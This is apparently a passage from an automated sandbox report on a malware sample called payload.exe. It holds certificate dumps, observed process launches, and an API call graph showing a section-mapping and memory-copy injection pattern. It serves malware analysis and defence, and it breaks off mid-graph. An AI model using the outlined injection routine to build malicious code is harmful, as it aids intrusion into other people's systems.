Aug 13, 2018 14:03:27.422796965 MESZ44349170152.199.19.161192.168.2.2CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IECN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri May 12 20:46:00 CEST 2000Tue May 13 01:59:00 CEST 2025[[ Version: V3 Subject: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 2048 bits modulus: 20579176651421167987106471718888186309534186253587759121109122482694167416584428920295678216035822449451639581023765122994089008826314029843654807108803739729565431642116323937940944378450034252354609020536286175863324156219063038927409933070688727356676027216359532593504366119272034244698731524943132462329205729047681997715455240148827523651706429854757422624117805863121520494307655271426986078917217383478420381375139154341613794371303682232583316393601620034638044186782252195438345309455714637508276892061355357785328168602107026282695945834955006612147350315937204256563720794300123948598669913435346712336953 public exponent: 65537 Validity: [From: Fri May 12 20:46:00 CEST 2000, To: Tue May 13 01:59:00 CEST 2025] Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE SerialNumber: [ 020000b9]Certificate Extensions: 3[1]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:3][2]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: E5 9D 59 30 82 47 58 CC AC FA 08 54 36 86 7B 3A ..Y0.GX....T6..:0010: B5 04 4D F0 ..M.]]] Algorithm: [SHA1withRSA] Signature:0000: 85 0C 5D 8E E4 6F 51 68 42 05 A0 DD BB 4F 27 25 ..]..oQhB....O'%0010: 84 03 BD F7 64 FD 2D D7 30 E3 A4 10 17 EB DA 29 ....d.-.0......)0020: 29 B6 79 3F 76 F6 19 13 23 B8 10 0A F9 58 A4 D4 ).y?v...#....X..0030: 61 70 BD 04 61 6A 12 8A 17 D5 0A BD C5 BC 30 7C ap..aj........0.0040: D6 E9 0C 25 8D 86 40 4F EC CC A3 7E 38 C6 37 11 ...%..@O....8.7.0050: 4F ED DD 68 31 8E 4C D2 B3 01 74 EE BE 75 5E 07 O..h1.L...t..u^.0060: 48 1A 7F 70 FF 16 5C 84 C0 79 85 B8 05 FD 7F BE H..p..\..y......0070: 65 11 A3 0F C0 02 B4 F8 52 37 39 04 D5 A9 31 7A e.......R79...1z0080: 18 BF A0 2A F4 12 99 F7 A3 45 82 E3 3C 5E F5 9D ...*.....E..<^..0090: 9E B5 C8 9E 7C 2E C8 A4 9E 4E 08 14 4B 6D FD 70 .........N..Km.p00A0: 6D 6B 1A 63 BD 64 E6 1F B7 CE F0 F2 9F 2E BB 1B mk.c.d..........00B0: B7 F2 50 88 73 92 C2 E2 E3 16 8D 9A 32 02 AB 8E ..P.s.......2...00C0: 18 DD E9 10 11 EE 7E 35 AB 90 AF 3E 30 94 7A D0 .......5...>0.z.00D0: 33 3D A7 65 0F F5 FC 8E 9E 62 CF 47 44 2C 01 5D 3=.e.....b.GD,.]00E0: BB 1D B5 32 D2 47 D2 38 2E D0 FE 81 DC 32 6A 1E ...2.G.8.....2j.00F0: B5 EE 3C D5 FC E7 81 1D 19 C3 24 42 EA 63 39 A9 ..<.......$B.c9.]
Aug 13, 2018 14:03:27.423629999 MESZ44349171152.199.19.161192.168.2.2CN=*.vo.msecnd.netCN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=USFri Mar 30 19:48:56 CEST 2018Mon Mar 30 19:48:56 CEST 2020[[ Version: V3 Subject: CN=*.vo.msecnd.net Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 26650803979259295716290423693905296698157083325048498445836080201188299707993523769983022596768079645285384865155132965572416436152378172025499450880633264224755571468835296223137555283971797334879051618498098440929892959115038801729724039469239084562396320177233195067487817337082459981077208444076525818793397580249136338078721428618161201050325403922256394870562406690344296180719053188791769325712246232155686598548851946583469494216117938492274511053022075022710177237525565910648338744931738281978430913279296706457579042005546769662912351613258485613692711958886470421185755835262239469076692855817140222781347 public exponent: 65537 Validity: [From: Fri Mar 30 19:48:56 CEST 2018, To: Mon Mar 30 19:48:56 CEST 2020] Issuer: CN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US SerialNumber: [ 20000270 cc6d2533 6ca081b3 59000000 0270cc]Certificate Extensions: 10[1]: ObjectId: 1.3.6.1.4.1.311.21.10 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 1A 30 18 30 0A 06 08 2B 06 01 05 05 07 03 02 ..0.0...+.......0010: 30 0A 06 08 2B 06 01 05 05 07 03 01 0...+.......[2]: ObjectId: 1.3.6.1.4.1.311.21.7 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 31 30 2F 06 27 2B 06 01 04 01 82 37 15 08 87 .10/.'+.....7...0010: DA 86 75 83 EE D9 01 82 C9 85 1B 81 B5 9E 61 85 ..u...........a.0020: F4 EB 60 81 5D 84 D2 DF 42 82 E7 93 7A 02 01 64 ..`.]...B...z..d0030: 02 01 1D ...[3]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://www.microsoft.com/pki/mscorp/Microsoft%20IT%20TLS%20CA%202.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.msocsp.com]][4]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 91 9E 3B 44 6C 3D 57 9C 42 77 2A 34 D7 4F D1 CC ..;Dl=W.Bw*4.O..0010: 4A 97 2C DA J.,.]][5]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://mscrl.microsoft.com/pki/mscorp/crl/Microsoft%20IT%20TLS%20CA%202.crl, URIName: http://crl.microsoft.com/pki/mscorp/crl/Microsoft%20IT%20TLS%20CA%202.crl]]][6]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.311.42.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 27 68 74 74 70 3A 2F 2F 77 77 77 2E 6D 69 63 .'http://www.mic0010: 72 6F 73 6F 66 74 2E 63 6F 6D 2F 70 6B 69 2F 6D rosoft.com/pki/m0020: 73 63 6F 72 70 2F 63 70 73 scorp/cps]] ]][7]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ clientAuth serverAuth][8]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment Data_Encipherment][9]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: *.vo.msecnd.net DNSName: *.adn.azureedge.net DNSName: *.ads2.msads.net DNSName: *.aspnetcdn.com DNSName: *.azurecomcdn.net DNSName: *.azureedge.net DNSName: *.azureedge-test.net DNSName: *.cdn.skype.com DNSName: *.cdn.skype.net DNSName: *.cmsresources.windowsphone.com DNSName: *.cmsresources.windowsphone-int.com DNSName: *.dev.skype.com DNSName: *.fms.azureedge.net DNSName: *.microsoft-sbs-domains.com DNSName: *.secure.skypeassets.com DNSName: *.secure.skypeassets.net DNSName: *.wac.azureedge.net DNSName: *.wpc.azureedge.net DNSName: *.ec.azureedge.net DNSName: *.wpc.ec.azureedge.net DNSName: *.wac.ec.azureedge.net DNSName: *.adn.ec.azureedge.net DNSName: *.fms.ec.azureedge.net DNSName: ajax.microsoft.com DNSName: cdnads.msads.net DNSName: cdn-resources.windowsphone.com DNSName: cdn-resources-beta.windowsphone.com DNSName: ecnads1.msn.com DNSName: iecvlist.microsoft.com DNSName: images-cms-pn.windowsphone-int.com DNSName: images-cms-tst.windowsphone-int.com DNSName: lumiahelptipscdn.microsoft.com DNSName: lumiahelptipscdnqa.microsoft.com DNSName: lumiahelptipsmscdn.microsoft.com DNSName: lumiahelptipsmscdnqa.microsoft.com DNSName: montage.msn.com DNSName: mscrl.microsoft.com DNSName: r20swj13mr.microsoft.com DNSName: *.streaming.mediaservices.windows.net DNSName: *.origin.mediaservices.windows.net DNSName: download.sysinternals.com DNSName: amp.azure.net DNSName: rt.ms-studiosmedia.com DNSName: gtm.ms-studiosmedia.com DNSName: *.aisvc.visualstudio.com DNSName: *.cdn.powerbi.com DNSName: dist.asp.net DNSName: embed.powerbi.com DNSName: msitembed.powerbi.com DNSName: dxtembed.powerbi.com DNSName: *.cdn.powerappscdn.net DNSName: downloads.subscriptionsint.tfsallin.net DNSName: download.my.visualstudio.com DNSName: cdn.vsassets.io DNSName: cdnppe.vsassets.io DNSName: stream.microsoft.com DNSName: datafactory.azure.com DNSName: *.cortanaanalytics.com DNSName: do.skype.com DNSName: software-download.office.microsoft.com DNSName: software-download.microsoft.com DNSName: prss.centralvalidation.com DNSName: *.gallerycdn.vsassets.io DNSName: *.gallerycdnppe.vsassets.io DNSName: global.asazure.windows.net DNSName: download.learningdownloadcenter.microsoft.com DNSName: www.videobreakdown.com DNSName: www.breakdown.me DNSName: *.gallerycdntest.vsassets.io DNSName: agavecdn.o365weve-dev.com DNSName: agavecdn.o365weve-ppe.com DNSName: agavecdn.o365weve.com DNSName: download.visualstudio.com DNSName: *.Applicationinsights.net DNSName: *.Applicationinsights.io DNSName: *.Applicationinsights.microsoft.com DNSName: *.sfbassets.com DNSName: *.sfbassets.net DNSName: download.mono-project.com DNSName: *.streaming.media-test.windows-int.net DNSName: *.origin.mediaservices.windows-int.net DNSName: *.mp.microsoft.com DNSName: download.visualstudio.microsoft.com DNSName: software-download.coem.microsoft.com DNSName: cdn.wallet.microsoft-ppe.com DNSName: cdn.wallet.microsoft.com DNSName: vi.microsoft.com DNSName: *.nuget.org DNSName: *.nugettest.org DNSName: cdn.botframework.com DNSName: *.streaming.media.azure.net DNSName: *.streaming.media.azure-test.net DNSName: natick.research.microsoft.com DNSName: quotecenter.microsoft.com DNSName: quotecenter-ppe.microsoft.com DNSName: cdn.cloudappsecurity.com DNSName: *.yammer.com DNSName: *.videoindexer.ai DNSName: *.api.videoindexer.ai][10]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: CD 01 B0 7E 67 61 98 56 52 16 A4 D7 17 C9 AD AE ....ga.VR.......0010: 2A BC B0 76 *..v]]] Algorithm: [SHA256withRSA] Signature:0000: 3F 55 65 AB A9 07 00 4E 0C CB 83 3F 4B 18 6D 39 ?Ue....N...?K.m90010: 16 43 19 BD 48 3B BB CC 9A 13 AD 73 42 8B BA 09 .C..H;.....sB...0020: 72 2E 49 86 78 02 64 85 67 44 39 C7 36 A9 87 15 r.I.x.d.gD9.6...0030: E0 83 E8 AA D0 CA 2C 47 E3 C9 77 D4 08 C2 1E B6 ......,G..w.....0040: 92 AA 54 0B 2B CD 55 A2 C9 29 89 71 11 70 E2 D0 ..T.+.U..).q.p..0050: 52 1F EF 8A 70 83 7A 90 80 35 5F B6 91 D0 CA 18 R...p.z..5_.....0060: E5 04 AC 0B 70 B1 25 4A 7E 4D FA 76 63 FC 45 B8 ....p.%J.M.vc.E.0070: 13 BF 84 C0 A1 CC C9 A9 29 37 8E 70 56 62 05 71 ........)7.pVb.q0080: 18 78 94 DB 1B 10 5B 0E A3 6C 15 F2 B5 BD 49 A1 .x....[..l....I.0090: D9 05 64 42 19 F9 B0 B6 D9 7B 7E E9 04 1D 73 9F ..dB..........s.00A0: 32 08 DD D2 85 C8 70 05 A6 13 3F D0 32 F1 10 6A 2.....p...?.2..j00B0: A7 DF 48 7F C4 24 DB 8D 9A 36 4D 8B 5B 7E 9B FB ..H..$...6M.[...00C0: EA F1 CA E6 40 4C 65 48 11 BF 13 1B D8 BF 00 4B ....@LeH.......K00D0: ED BE BF 27 9F 19 48 26 79 73 92 69 68 48 D1 9F ...'..H&ys.ihH..00E0: FC 51 70 9D 1F A0 7E 1C 5A 87 D3 8C 4E 70 62 E0 .Qp.....Z...Npb.00F0: 56 2A 83 29 BE F6 59 92 57 4F 3D DC 71 8E 0A D4 V*.)..Y.WO=.q...0100: 08 FC EE C6 94 9A 5E 31 7C 27 5F 1E 6D 90 66 0A ......^1.'_.m.f.0110: 3E C3 90 20 48 3C 04 DF B6 2F 3E 70 C6 4A 60 E5 >.. H<.../>p.J`.0120: 20 B1 9B DF 48 2B 88 E5 33 76 FA 0E B5 5A 2D 2F ...H+..3v...Z-/0130: 71 47 05 80 C6 57 A0 14 B6 A5 35 56 9B B6 A6 20 qG...W....5V... 0140: 00 6C 70 4F 2F B6 AD BD F3 EA 5B 60 F5 14 ED 6B .lpO/.....[`...k0150: 6B 44 15 CE 91 2D 7F 36 11 3E 39 EB CC C3 DF A9 kD...-.6.>9.....0160: FB A8 9D 7F 64 94 A5 87 E0 7F 2F 0F 91 56 4E F5 ....d...../..VN.0170: F5 49 9F 9F 8E 6E 13 B4 94 7E 24 A6 B2 E1 F3 DA .I...n....$.....0180: 3E DE EC 5E FB 64 29 DC 57 F3 46 73 07 03 A2 69 >..^.d).W.Fs...i0190: 69 7A 01 0F 2C 72 11 8C 8E 41 DF 6B 93 09 B2 F0 iz..,r...A.k....01A0: DF B1 82 40 2E 1B FD 1C 22 DE EB 6C 2B 89 33 BE ...@...."..l+.3.01B0: 6C 14 2F FC ED 2E 3E B8 D7 B8 45 44 DE AC 64 FA l./...>...ED..d.01C0: 15 8E 95 BB 4E 04 04 75 3D 13 A2 1D 94 7A B8 8E ....N..u=....z..01D0: 24 6D CD 66 E7 40 7E E5 C3 4F BC 22 8A D7 78 A1 $m.f.@...O."..x.01E0: 7C 0A 95 87 55 CC CF 8F 41 57 91 98 E7 AA E7 DE ....U...AW......01F0: C5 C2 0C D1 A1 03 76 BC 82 C6 C9 9E 3F 98 43 7D ......v.....?.C.]
Aug 13, 2018 14:03:27.423629999 MESZ44349171152.199.19.161192.168.2.2CN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri May 20 14:51:57 CEST 2016Mon May 20 14:51:57 CEST 2024[[ Version: V3 Subject: CN=Microsoft IT TLS CA 2, OU=Microsoft IT, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 4096 bits modulus: 647294255602325793990002513119693468857392867898417605410250896666240868552526284895128080800072075079541116694006108111424285769210952443117016108817512004416915652231910726180601295496484283455657703546650167672472095813058953881613183359786366741204887237778758654131517015592572803423794117451702755161544979434031590265341003857135228312611468237470025540692665622782242245418396439043641638694688252969318505934528611852331845685201979673767756215622457277048995475799862983198559683031746002361975577371668527079660623700395748659568646041541973621714023268935223403435124814495591465766470454743043858485541464708934243998176475016309920664622704013423283337532488437325584305269612425692156906642521785806736108836293408234401329760217850656597482737516435684644509149184860637949964770877674659801402449999763931813660784340254013505819744099600848977200865054274097501530563387171488283923635556233850167978272146006159159364253066097677840315992598562396543614479225118965642333219965644634595301995940368770892345795950122637528531630935913800079064090039488940652767821851441910089798494405128972383400235177579883092457976791664618121612668703609711139468476583630291006864328822405235915054059848188166737876217120001 public exponent: 65537 Validity: [From: Fri May 20 14:51:57 CEST 2016, To: Mon May 20 14:51:57 CEST 2024] Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE SerialNumber: [ 0f2c10c9 5b06c093 7fb8d449 f83e8569]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: E5 9D 59 30 82 47 58 CC AC FA 08 54 36 86 7B 3A ..Y0.GX....T6..:0010: B5 04 4D F0 ..M.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl3.digicert.com/Omniroot2025.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth OCSPSigning][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 91 9E 3B 44 6C 3D 57 9C 42 77 2A 34 D7 4F D1 CC ..;Dl=W.Bw*4.O..0010: 4A 97 2C DA J.,.]]] Algorithm: [SHA256withRSA] Signature:0000: 6C 7F EA 6A 6F CF 6B 5B C1 34 AC FF DC 0E E0 7D l..jo.k[.4......0010: 8B 13 17 E0 2F 4E 59 0E C4 03 B9 F4 05 29 65 47 ..../NY......)eG0020: AE 19 9A E8 54 F6 64 D5 D8 BD 06 E0 71 22 19 7B ....T.d.....q"..0030: CE 9A DD 79 8B DF 70 27 48 68 DB F7 6F 33 19 B5 ...y..p'Hh..o3..0040: 65 EB 9F 90 07 CC B8 47 39 7D 0F 51 13 91 0D 80 e......G9..Q....0050: D4 76 50 2B 85 07 60 6D 6D 59 9A 29 40 16 C6 C7 .vP+..`mmY.)@...0060: 0D E0 6A 57 4B 80 09 BF EF C7 4B 45 57 B3 94 AE ..jWK.....KEW...0070: D7 D2 74 0C 0F 01 83 E9 68 F1 E9 02 97 87 6A D8 ..t.....h.....j.0080: 6D 66 D5 6B 02 BC 50 48 A0 B2 23 77 89 DE 08 B9 mf.k..PH..#w....0090: 46 A3 14 F6 8C 0E 37 96 3D 89 A5 0F D2 32 42 E4 F.....7.=....2B.00A0: 2F 2F 43 5E 3F C9 1D DB 2A 24 34 79 A2 07 22 8F //C^?...*$4y..".00B0: 85 48 5F C5 7E 6D 50 F4 34 2C 3B 91 06 BA 52 5A .H_..mP.4,;...RZ00C0: BD 66 8D 23 0C 4A B5 6A DE 33 49 E1 F8 99 5D 8F .f.#.J.j.3I...].00D0: 30 CD CB C0 85 C1 03 6C 68 E6 C7 5A D5 C9 D4 58 0......lh..Z...X00E0: 9A 37 3E AE 2E 32 07 0B 7B 4B 7E 7C 2B AD DF C3 .7>..2...K..+...00F0: 4C 91 39 7C 17 46 AB 7E 5B 29 6A A5 15 55 4A 2F L.9..F..[)j..UJ/]
Aug 13, 2018 14:03:27.423629999 MESZ44349171152.199.19.161192.168.2.2CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IECN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri May 12 20:46:00 CEST 2000Tue May 13 01:59:00 CEST 2025[[ Version: V3 Subject: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 2048 bits modulus: 20579176651421167987106471718888186309534186253587759121109122482694167416584428920295678216035822449451639581023765122994089008826314029843654807108803739729565431642116323937940944378450034252354609020536286175863324156219063038927409933070688727356676027216359532593504366119272034244698731524943132462329205729047681997715455240148827523651706429854757422624117805863121520494307655271426986078917217383478420381375139154341613794371303682232583316393601620034638044186782252195438345309455714637508276892061355357785328168602107026282695945834955006612147350315937204256563720794300123948598669913435346712336953 public exponent: 65537 Validity: [From: Fri May 12 20:46:00 CEST 2000, To: Tue May 13 01:59:00 CEST 2025] Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE SerialNumber: [ 020000b9]Certificate Extensions: 3[1]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:3][2]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: E5 9D 59 30 82 47 58 CC AC FA 08 54 36 86 7B 3A ..Y0.GX....T6..:0010: B5 04 4D F0 ..M.]]] Algorithm: [SHA1withRSA] Signature:0000: 85 0C 5D 8E E4 6F 51 68 42 05 A0 DD BB 4F 27 25 ..]..oQhB....O'%0010: 84 03 BD F7 64 FD 2D D7 30 E3 A4 10 17 EB DA 29 ....d.-.0......)0020: 29 B6 79 3F 76 F6 19 13 23 B8 10 0A F9 58 A4 D4 ).y?v...#....X..0030: 61 70 BD 04 61 6A 12 8A 17 D5 0A BD C5 BC 30 7C ap..aj........0.0040: D6 E9 0C 25 8D 86 40 4F EC CC A3 7E 38 C6 37 11 ...%..@O....8.7.0050: 4F ED DD 68 31 8E 4C D2 B3 01 74 EE BE 75 5E 07 O..h1.L...t..u^.0060: 48 1A 7F 70 FF 16 5C 84 C0 79 85 B8 05 FD 7F BE H..p..\..y......0070: 65 11 A3 0F C0 02 B4 F8 52 37 39 04 D5 A9 31 7A e.......R79...1z0080: 18 BF A0 2A F4 12 99 F7 A3 45 82 E3 3C 5E F5 9D ...*.....E..<^..0090: 9E B5 C8 9E 7C 2E C8 A4 9E 4E 08 14 4B 6D FD 70 .........N..Km.p00A0: 6D 6B 1A 63 BD 64 E6 1F B7 CE F0 F2 9F 2E BB 1B mk.c.d..........00B0: B7 F2 50 88 73 92 C2 E2 E3 16 8D 9A 32 02 AB 8E ..P.s.......2...00C0: 18 DD E9 10 11 EE 7E 35 AB 90 AF 3E 30 94 7A D0 .......5...>0.z.00D0: 33 3D A7 65 0F F5 FC 8E 9E 62 CF 47 44 2C 01 5D 3=.e.....b.GD,.]00E0: BB 1D B5 32 D2 47 D2 38 2E D0 FE 81 DC 32 6A 1E ...2.G.8.....2j.00F0: B5 EE 3C D5 FC E7 81 1D 19 C3 24 42 EA 63 39 A9 ..<.......$B.c9.]

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: payload.exe PID: 3556 Parent PID: 3040

General

Start time:14:02:45
Start date:13/08/2018
Path:C:\Users\user\Desktop\payload.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\payload.exe'
Imagebase:0x400000
File size:56832 bytes
MD5 hash:9CB0D02CBC93981015F6C050A0778CFD
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: iexplore.exe PID: 3772 Parent PID: 548

General

Start time:14:03:27
Start date:13/08/2018
Path:C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):false
Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:0xfb0000
File size:815312 bytes
MD5 hash:CA1F703CD665867E8132D2946FB55750
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: iexplore.exe PID: 3828 Parent PID: 3772

General

Start time:14:03:28
Start date:13/08/2018
Path:C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):false
Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:3772 CREDAT:275457 /prefetch:2
Imagebase:0xfb0000
File size:815312 bytes
MD5 hash:CA1F703CD665867E8132D2946FB55750
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: ssvagent.exe PID: 3880 Parent PID: 3828

General

Start time:14:03:28
Start date:13/08/2018
Path:C:\Program Files\Java\jre1.8.0_144\bin\ssvagent.exe
Wow64 process (32bit):false
Commandline:'C:\PROGRA~1\Java\JRE18~1.0_1\bin\ssvagent.exe' -new
Imagebase:0xad0000
File size:53312 bytes
MD5 hash:0953A0264879FD1E655B75B63B9083B7
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: payload.exe PID: 3556 Parent PID: 3040

    Execution Graph

    Execution Coverage:14.6%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:25%
    Total number of Nodes:605
    Total number of Limit Nodes:82

    Graph

    execution_graph 3034 401000 HeapCreate 3035 401019 GetModuleHandleA GetCommandLineW 3034->3035 3036 40103e ExitProcess 3034->3036 3039 401070 3035->3039 3061 401aa8 CreateEventA 3039->3061 3041 401086 3042 401090 GetCursorPos 3041->3042 3043 4011ea 3041->3043 3046 4010a0 WaitForSingleObject 3042->3046 3044 4011f3 ExitProcess 3043->3044 3045 401030 HeapDestroy 3043->3045 3045->3036 3047 4010b2 GetCursorPos 3046->3047 3048 4010db 3046->3048 3068 401b1c lstrcpynA 3047->3068 3048->3043 3076 401c4a 3048->3076 3055 4011d6 3055->3043 3056 4011e2 GetLastError 3055->3056 3056->3043 3058 401128 3058->3055 3058->3058 3059 40119e GetCurrentThreadId GetCurrentThread 3058->3059 3094 40134b 3059->3094 3062 401b15 GetLastError 3061->3062 3063 401ac6 GetVersion 3061->3063 3064 401ad0 3063->3064 3065 401ad8 GetCurrentProcessId OpenProcess 3064->3065 3066 401b10 3064->3066 3067 401b05 3065->3067 3066->3041 3067->3041 3069 401b61 3068->3069 3070 4010d4 3069->3070 3071 401b99 VirtualAlloc 3069->3071 3070->3046 3070->3048 3071->3070 3072 401bc9 3071->3072 3073 401c10 3072->3073 3074 401bff memcpy 3072->3074 3075 401c17 VirtualFree 3073->3075 3074->3075 3075->3070 3077 401c62 GetModuleHandleA GetProcAddress 3076->3077 3078 401c87 3076->3078 3077->3078 3079 4010e8 3077->3079 3078->3079 3080 401c8b IsWow64Process 3078->3080 3081 402653 GetModuleHandleA 3079->3081 3080->3079 3082 40266f GetModuleHandleA 3081->3082 3083 4010fb 3081->3083 3085 40267d 3082->3085 3083->3055 3087 4026c5 3083->3087 3086 4026b5 3085->3086 3123 4027db 3085->3123 3086->3083 3092 402701 3087->3092 3089 402770 3090 40276e 3089->3090 3091 40279e memcpy 3089->3091 3090->3058 3091->3090 3092->3089 3092->3090 3128 401046 HeapAlloc 3092->3128 3129 40105b HeapFree 3092->3129 3096 401373 3094->3096 3095 4013a0 3095->3055 3096->3095 3100 4013bb 3096->3100 3171 401046 HeapAlloc 3096->3171 3101 4013c4 3100->3101 3130 4015e5 NtCreateSection 3100->3130 3101->3095 3107 401585 memset 3101->3107 3102 401555 3103 401570 3102->3103 3104 40155e NtUnmapViewOfSection RtlNtStatusToDosError 3102->3104 3103->3101 3106 401576 CloseHandle 3103->3106 3104->3103 3106->3101 3182 40105b HeapFree 3107->3182 3108 40144a 3108->3102 3140 4016a4 3108->3140 3112 401475 memcpy 3114 401481 memcpy 3112->3114 3115 4014d6 3114->3115 3116 40151f 3115->3116 3117 401512 3115->3117 3147 401203 3116->3147 3172 4012ac 3117->3172 3120 40151d 3120->3102 3121 40152c memcpy 3120->3121 3159 4022ad 3121->3159 3124 4027e7 3123->3124 3125 4028d4 3124->3125 3126 4028b3 lstrlenA 3124->3126 3127 4028a7 lstrcmp 3124->3127 3125->3085 3126->3124 3127->3124 3128->3092 3129->3092 3131 401680 RtlNtStatusToDosError 3130->3131 3132 40164a 3130->3132 3134 401679 3131->3134 3183 4015a6 NtMapViewOfSection RtlNtStatusToDosError 3132->3183 3136 40141a 3134->3136 3137 401692 ZwClose 3134->3137 3135 401658 3135->3134 3138 40165e memset 3135->3138 3136->3102 3139 4015a6 NtMapViewOfSection RtlNtStatusToDosError 3136->3139 3137->3136 3138->3134 3139->3108 3141 4016e7 3140->3141 3142 401711 memcpy 3141->3142 3143 4016f2 memcpy 3141->3143 3144 401721 3142->3144 3143->3144 3145 40174e memcpy 3144->3145 3146 401463 3144->3146 3145->3144 3146->3102 3146->3112 3146->3114 3148 40122e GetModuleHandleA 3147->3148 3149 401214 3147->3149 3150 401242 3148->3150 3151 4012a5 3148->3151 3149->3148 3152 401292 memcpy 3149->3152 3184 401c9f 3150->3184 3151->3120 3152->3151 3155 401c9f 10 API calls 3156 401266 3155->3156 3156->3151 3157 401c9f 10 API calls 3156->3157 3158 401280 3157->3158 3158->3151 3158->3152 3214 401046 HeapAlloc 3159->3214 3161 4022c2 3162 402311 3161->3162 3163 4022c8 memset 3161->3163 3162->3102 3164 402301 3163->3164 3165 4022ee 3163->3165 3215 40218d memset 3164->3215 3165->3164 3167 4022f7 3165->3167 3233 40203c memset 3167->3233 3170 4022ff 3244 40105b HeapFree 3170->3244 3171->3100 3173 4012bc 3172->3173 3174 40244e 16 API calls 3173->3174 3175 401332 memcpy 3173->3175 3176 4012e7 3174->3176 3177 401345 3175->3177 3176->3177 3178 40244e 16 API calls 3176->3178 3177->3120 3179 401304 3178->3179 3179->3177 3180 40244e 16 API calls 3179->3180 3181 401321 3180->3181 3181->3175 3181->3177 3182->3095 3183->3135 3197 402526 3184->3197 3187 40124c 3187->3151 3187->3155 3188 4027db 2 API calls 3191 401cc7 3188->3191 3189 401d3a 3209 40105b HeapFree 3189->3209 3191->3189 3192 401cdc CreateFileA 3191->3192 3192->3189 3193 401cfd SetFilePointer 3192->3193 3194 401d31 CloseHandle 3193->3194 3195 401d0b ReadFile 3193->3195 3194->3189 3195->3194 3196 401d23 3195->3196 3196->3194 3210 401046 HeapAlloc 3197->3210 3199 40253b 3200 